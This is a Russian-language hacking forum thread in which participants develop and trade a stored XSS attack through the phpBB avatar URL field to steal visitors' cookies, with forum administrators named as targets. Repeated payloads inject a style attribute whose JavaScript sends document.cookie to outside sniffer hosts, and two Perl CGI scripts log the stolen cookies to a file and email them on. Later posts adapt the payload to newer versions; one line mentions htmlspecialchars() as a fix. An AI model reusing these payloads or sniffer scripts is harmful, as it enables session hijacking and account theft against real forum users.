йопт!! запарился уже... мож потому и не могу решить проблему, что она слишком легкая :confused:
Короче так, на форуме phpBB есть возможность вставлять аватар со своего url , решил проверить на дырочку, и вписал туда javascript:alert();
в ответ получил:
<img src="javascript:alert();" alt="" border="0" />
идем дальше...
решил проверить на окончание *.jpg , вписав x.jpg и получил:
<img src="x.jpg" alt="" border="0" />
затем проверил вписав x.ru x=`x.jpg получил:
<img src="x.ru x=`x.jpg" alt="" border="0" />
и т.п.
Вопрос вот в чем: пишу вместо картинки снифер (http://antichat.ru/cgi-bin/s.jpg) и он прекрасно его ловит, однаком не нужны куки всех, у кого грузится страница с моим аватором, все перепробовал, но нифига не получается :mad: Помогите плзз... :(

Приведи код, который ты вставляешь в форум.

поэтому и спрашиваю, как код оформить?? Дело в том, что форум съедает любые варианты, т.е. что бы не писалось в поле ссылки на аватар - все будет отображаться как картинка, например:
пишем в поле bla-bla-bla
получится <img src="bla-bla-bla" alt="" border="0" />
пишем javascript:alert(document.cookie)
и при загрузки страницы нам открывается alert окно в котором наши куки, а в html-тегах видим <img src="javascript:alert(document.cookie)" alt="" border="0" />
Словом, все, что бы Мы не писали в графе аватара, форум будет съедать как картинку <img src="наш текст">
Вот Я и спрашиваю, как мне вместо отображения document.cookie у юзера отдать запрос сниферу, что бы он их словил, а у юзера ни чего не отображалось?? Многое пререпробовал, но результат один и тот же - снифер ловит opener.location (url на котором находится юзер), то бишь адрес, откуда был вызван снифер, а не document.cookie - его куки...
Потенциальная дырка есть, но ее нужно оформить!! Есть идеи?! ;)

Ура-а-а-а-а-а!!!!!! Решение найдено!! :cool: ;) :p

Короче так... :cool:
Есть в phpBB такая хреновина, как аватар и там нет фильтра на спец символы, а это нам позволяет делать все, что вздумается ;) Инфы об этом XSS ни где не встречал, поэтому можно считать новой :rolleyes:

XSS такой:
http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
где [target] - url на реальную картинку
localhost - url снифера

В ответ от сервера получаем в html-тегах:
<img src="http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)" alt="" border="0" />

таким образом грузится картинка, не доставляющая жертве (ею может быть админ) ни каких неудобств, в то время как его куки уходят к сниферу :rolleyes:

з.ы. кто первый - тот и пускай пишет ролик для видео.античат.ру , тока просьба указать, что эту ни кому не приметную багу нашел zFlex.
С ув., Йа ))

Мля мля неработает ... http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)

Как именно вставить в сообщение на форуме эту штуку ??

Блин,ты че глупый,какой нафиг сообщение в форуме...это вставляется в АФАТАР!!!т.е. когда регаешься или редактируешь свой акк,там пишешь,где url: http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)?


P.s.: я могу написать видео...

Обломчик,на большенстве серверов стоит блок 8)

Блин,ты че глупый,какой нафиг сообщение в форуме...это вставляется в АФАТАР!!!т.е. когда регаешься или редактируешь свой акк,там пишешь,где url: http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)?


А где скрипт взять, который записывал бы их в отдельное файло ? У меня есть но они неканают или я чё то неправельно делаю....

#!/usr/bin/perl -w
#
open cOOKIES,"cookies.txt";
print "Conter-Type:text/html\n\n\";
#
#
print COOKIES "-------------new cookie----------\n";
#
#
#
print COOKIES "$ENV{'QERY_STRING'}\n';
#
print COOKIES "---------end of cookie------------"\n\n";
#
close COOKIES;


и ещё


#!/usr/bin/perl
use CGI qw(:standard);
$cookie=$ENV{QUERY_STRING};
$file="cookies.txt"; //???? ??????????? ????
open FILE, ">>$file";
print FILE "$cookie\n\n";
close FILE;
$query = CGI::new();
print $query->redirect('http://www.musthave.ru');
$mailprog = '/usr/sbin/sendmail';
$mail='xaker@xaker.ru'; //??? ???????? ???? ???? ? ????????? ??? ???????
$target='pass@admina.net';
open MAIL, "|mailprog -t";
print MAIL "Content-Type: text/plain\n";
print MAIL "Subject: new cookies\n";
print MAIL "To: $mail\n";
print MAIL "From: .$target\n\n";
print MAIL "$cookie";
close MAIL;


Дак вот как привельно составить эту строчку и почему у меня это дело всё неработает ... ваще Шляпа какая то :| :mad:

Парни помогите или дайте ссылку на мануал ..... нужно ... или оправте скрипт и ссылку на мыло alien51@yandex.ru заранее спасибо.

Вот пример:
http://www.smailiki.nm.ru/lam/lam4.gif" style="background:url(javascript:document.images[0].src=/http:xxantichat.ruxcgi-binxs.jpg?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)

Кто будет писать видео, просьба написать, что уязвимость нашел Mr. Iron (icq # 9170797)
Самое простое решение против этого XSS - это htmlspecialchars()
;)

да прикольно..

Плохо что максимум что можно с этого взять это базу пользователей

Кстате,под эту уязвимость не попадает Phpbb 2.0.11 ....
если я не прав... заделитесь ссылочкой Icq:937843

Тока зря все эти шаманские танцы с .source.replace(/x/g,String.fromCharCode(47))
Это можно сделать намного проще:

http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)

:D

Тока зря все эти шаманские танцы с .source.replace(/x/g,String.fromCharCode(47))
Это можно сделать намного проще:

http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)

:D

урааааааааа Работает даже на версси PHPBB 2.0.11

plunul eto:
document.writeln (
"<a target=_blank href='http://ad.strict.tbn.ru/bb.cgi?cmd=go&r=r_ssi" +
"&vbn=353&pac=2836328&pnm=7&bac=69735877&bnm=2&ref=http%3A%2F%2Ftattoo%2Efani%2Eru%2F&loc=&htr=http%3A%2F%2Ftattoo%2Efani%2Eru%2Fgallery%2F'>" +
"<img src='http://195.161.118.159/69735/69735877_2.gif' border=0 width=468 height=60 alt=\"TBN -- The Banner Network\" title=\"TBN -- The Banner Network\"></a>"
);

http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)
И куда сохраняется файл с Хешами ???

Вот вот где путь то на скрип и какой должен быть скрипт ... ??

урааааааааа Работает даже на версси PHPBB 2.0.11

Ой ли. У меня на форуме кавычки спокойно квотируются:
<img src="http://avatar.com/x.jpg&quot; bb=&quot;http://antichat.ru

Ой ли. У меня на форуме кавычки спокойно квотируются:
<img src="http://avatar.com/x.jpg&quot; bb=&quot;http://antichat.ru

А так проходит?

http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)

А так проходит?

http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)


такая длинная конструкция - нет :)
<img src="http://aaa.bb/x.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:documen" alt="" /><br />

Да и админы уже года 2 IE не юзают :cool:

загнал в аватар тестовую строку
<img src="http://abc.ru/x.gif` style=`background:url(javascript:alert())" alt="" border="0" /><br /><br />

в IE не отработало

Он и не сработает ... Я что-то перемудрил по ходу дела....
По идее, сработает он в таком случае:

<img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert()) alt="" border="0">

Но т.к. кавычки преобразуются, то он тоже не сработает ...)
Сейчас подумаем еще ...

вот смотрю на вас и не знаю че сказать...

Как бы Егор меня не путал, по идее оба скрипта синтаксически верны:

<img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert('1')) alt="" border="0">
<img src=`http://abc.ru/x.gif`style=background-image:url(javascript:alert('2')) alt="" border="0">

И вот в чем была моя ошибка и чего я не учел:
Аватара отображается как

<img src="http:/site/1.jpg" alt="" border="0" />

И само собой разумеется, что я предложил синтаксически неверно (в нашем случае):

http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)

Все это преобразуется в <img src=" http://www.smailiki.nm.ru/lam/lam4.gif` .... ... что является галиматьей полной и естесственно не сработает ...
Получается - раз кавычки преобразуются в &quot; , то за пределы <img src="... никуда не выйти ...

Извиняюсь за свою ошибку - просто я не вчитался в тему ...

Ничего, со всякими случается.

Не работает...
пишет:
Файл по указанному вами Url не содержит данных
чё не так?...

да, попадается...
может на новых версиях не рубит фишка?

Дак а какой вариант верный??? :)

http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[0].src="http://www.sniffsite.ru/sniff.php?"+document.cookie)

вставить можно на некоторых форумах, названия не скажу, эта информация недоступна для таких бухал как ты...

Нда ... круто!!!

скоро бои устраивать будем =))
да не, чел нормльный вроде, вот как закончит прикалываться, можно даже общаться с ним....

http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[0].src="http://www.sniffsite.ru/sniff.php?"+document.cookie)
Речь шла о пхпбб, а не о Инвизион.

Речь шла о пхпбб, а не о Инвизион.
wj, прикрыли твои уязвимости в пхпбб. пора новые делать, пусть 20 ю выпускают. )) когда первые заплатки написали, все проходило в другом регистре (URL). а теперь не прокатывает. хотя не знаю как в других форумах, а в пхпбб все хсс можно через админку прикрыть, не меняя кода. но этого никто не делал.

wj, прикрыли твои уязвимости в пхпбб. пора новые делать, пусть 20 ю выпускают. )) когда первые заплатки написали, все проходило в другом регистре (URL). а теперь не прокатывает. хотя не знаю как в других форумах, а в пхпбб все хсс можно через админку прикрыть, не меняя кода. но этого никто не делал.
Знаю что прикрыли, по этому Я уже прибежал на помощь. Замените мой второй тег урл, на тег мыла.

Так же есть уязвимость в теге картинки.